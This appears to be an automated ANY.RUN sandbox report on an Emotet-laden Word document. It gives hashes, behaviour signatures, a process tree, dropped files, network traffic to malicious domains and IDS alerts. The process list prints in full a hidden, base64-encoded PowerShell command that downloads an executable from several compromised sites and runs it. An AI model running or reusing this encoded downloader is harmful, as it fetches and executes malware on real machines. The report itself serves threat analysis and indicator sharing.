analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://brinkelstock.com/cgi-bin/dz70-ftxui-039/

Full analysis: https://app.any.run/tasks/49ac7ee8-b711-4841-a2ff-d54b86db809a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 20:05:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
loader
Indicators:
MD5:

6B5071B99FA8656EEADE9BCF2F4A7C50

SHA1:

DAC2D83EF0FEF8D993C0945012BAFD18BE0321CD

SHA256:

FC4EB579E363376681DB127CD18100ADADA4EE8C45CB994943A4AB6AD849CF39

SSDEEP:

3:N1KcaJWkdlMIqa6UdZL7n:CcaJWkoa6SXn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 3088)
      • WINWORD.EXE (PID: 3576)
    • Application was dropped or rewritten from another process

      • 11.exe (PID: 1904)
      • 11.exe (PID: 3116)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3936)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3576)
    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2160)
      • WINWORD.EXE (PID: 3576)
    • Executed via WMI

      • powershell.exe (PID: 3936)
    • PowerShell script executed

      • powershell.exe (PID: 3936)
    • Creates files in the user directory

      • powershell.exe (PID: 3936)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3936)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3088)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3088)
    • Changes internet zones settings

      • iexplore.exe (PID: 2160)
    • Application launched itself

      • iexplore.exe (PID: 2160)
    • Creates files in the user directory

      • iexplore.exe (PID: 3088)
      • WINWORD.EXE (PID: 3576)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3576)
      • WINWORD.EXE (PID: 1816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe 11.exe no specs 11.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2160"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3088"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2160 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3576"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1II6YSRA\INVOICE_S99_887[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1816"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3936powershell -w hidden -en JABBAHMAYQB1AGMAbgBhAHEAZQB6AGgAPQAnAEkAcgB3AHkAeABsAHcAdwBtAGMAaAAnADsAJABGAHAAZwB4AGcAbgBwAHQAIAA9ACAAJwAxADEAJwA7ACQAVgBhAHQAbQB6AHEAZABnAG4AagBzAD0AJwBRAG0AZwB1AHUAbABjAHkAZwBqAG8AcwBoACcAOwAkAFUAaABnAGoAbQBiAGoAcQBjAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAcABnAHgAZwBuAHAAdAArACcALgBlAHgAZQAnADsAJABPAHAAdAB0AHcAeQBmAHEAbABuAGgAZAA9ACcARABuAGcAeQBwAGcAagBnACcAOwAkAFAAeQBwAGsAegB4AGoAdAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBiAEMAbABpAEUAbgBUADsAJABCAGQAaABwAHgAZwBsAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgBlAHcAdAByAGUAbgBkAG0AYQBsAGwALgBzAHQAbwByAGUALwAwADEALQBpAG4AcwB0AGEAbABsAC8AYgBGAE4AaQBXAG4AVgBWAEkALwAqAGgAdAB0AHAAOgAvAC8AcwBjAGEAbQBtAGUAcgByAGUAdgBpAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBEAFMAcwBjAFgASABtAC8AKgBoAHQAdABwADoALwAvAG4AYQBtAGkAcwBhAGYAZgByAG8AbgAuAGMAbwBtAC8AdgA1ADkAcgBuAGkALwBaAFQAdQBhAEoAYQBuAGMAbwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwBvAGQAZABhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkAGUANABwADIAZQBjADMALQB3AGoANABtAGcAaABqAG8AdQAtADEANQA4ADgAOQAvACoAaAB0AHQAcABzADoALwAvAG0AYQB4AGIAaQBsAGwALgBkAGUAdgBwAGEAYwBlAC4AbgBlAHQALwBCAGwAbwBnAC8AdgBsADAAMQBzAC0AMwBiAHUAcQBjAGoALQAwADkAOAAwADcANwAzADAANAAxAC8AJwAuACIAUwBwAGAAbABpAFQAIgAoACcAKgAnACkAOwAkAE8AZABxAG8AcQBlAHUAcwB2AGkAPQAnAFEAeQBjAHgAbAB3AHUAZwBuAGgAcwB2AGQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAgAGkAbgAgACQAQgBkAGgAcAB4AGcAbAB5ACkAewB0AHIAeQB7ACQAUAB5AHAAawB6AHgAagB0AHcALgAiAEQAYABvAHcATgBsAG8AQQBkAGAARgBgAGkATABFACIAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAsACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkAOwAkAFQAcgBwAGwAaQBoAGcAZgB0AD0AJwBaAGgAdABwAGkAYgBrAGYAdwBpAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkALgAiAGwAZQBuAGAARwBgAFQASAAiACAALQBnAGUAIAAzADQAMAA4ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQByAHQAIgAoACQAVQBoAGcAagBtAGIAagBxAGMAbAApADsAJABMAGIAegBoAGsAdQBsAHUAdgBhAGEAPQAnAEkAcQBrAHQAaQBwAHUAdwBuAG4AeAB6AHIAJwA7AGIAcgBlAGEAawA7ACQAWgBhAHgAegB1AHkAeABmAGcAeABqAG0AZgA9ACcAUwBvAGMAZQBjAHAAbQBvAG4AYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAG8AYgBpAHMAagBuAHUAdgBkAGIAPQAnAEwAbABkAHYAegBkAHAAcgBjAHUAagB3AG0AJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1904"C:\Users\admin\11.exe" C:\Users\admin\11.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3116--eb6c268aC:\Users\admin\11.exe11.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Version:
1, 0, 0, 1
Total events
3 491
Read events
2 591
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
10
Unknown types
12

Dropped files

PID
Process
Filename
Type
2160iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2160iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2160iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF98908522C872755F.TMP
MD5:
SHA256:
3576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBFA1.tmp.cvr
MD5:
SHA256:
3576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\721A1F84.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\41E8946D.wmf
MD5:
SHA256:
1816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\8297F78A.wmf
MD5:
SHA256:
1816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\5AD28E03.wmf
MD5:
SHA256:
1816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\5F916828.wmf
MD5:
SHA256:
1816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_6FB28849-A96E-42C5-B337-21EDA9A86CE5.0\F5CA3A09.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3936
powershell.exe
GET
93.115.151.36:80
http://newtrendmall.store/01-install/bFNiWnVVI/
IR
suspicious
3088
iexplore.exe
GET
200
43.255.154.112:80
http://brinkelstock.com/cgi-bin/dz70-ftxui-039/
SG
document
122 Kb
suspicious
3936
powershell.exe
GET
200
205.144.171.72:80
http://scammerreviews.com/wp-admin/DSscXHm/
US
executable
492 Kb
malicious
2160
iexplore.exe
GET
200
13.107.21.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3936
powershell.exe
205.144.171.72:80
scammerreviews.com
Sharktech
US
malicious
3936
powershell.exe
93.115.151.36:80
newtrendmall.store
Asiatech Data Transfer Inc PLC
IR
suspicious
3088
iexplore.exe
43.255.154.112:80
brinkelstock.com
GoDaddy.com, LLC
SG
suspicious
2160
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
brinkelstock.com
  • 43.255.154.112
unknown
newtrendmall.store
  • 93.115.151.36
suspicious
scammerreviews.com
  • 205.144.171.72
malicious

Threats

PID
Process
Class
Message
3936
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3936
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
3936
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3936
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info